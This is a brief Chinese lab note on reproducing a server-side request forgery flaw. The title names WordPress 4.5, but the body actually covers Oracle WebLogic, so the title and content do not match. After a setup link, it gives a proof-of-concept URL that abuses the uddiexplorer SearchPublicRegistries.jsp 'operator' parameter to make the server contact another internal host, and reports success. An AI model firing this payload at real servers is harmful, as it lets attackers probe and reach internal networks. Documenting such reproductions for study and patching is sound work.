漏洞復現 | WordPress _4.5 SSRF
- 2019 年 10 月 7 日
- 筆記
一、環境搭建
https://www.cnblogs.com/0x4D75/p/8916428.html#%E4%B8%8B%E8%BD%BD%E5%AE%89%E8%A3%85weblogic
經過了千辛萬苦,修改了無數次啟動文件,終於啟動了weblogic
二、Weblogic SSRF漏洞復現
構造POC:http://172.16.1.139:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.1.107:23333
可以看到瀏覽器向其他主機發送了一條請求,復現成功!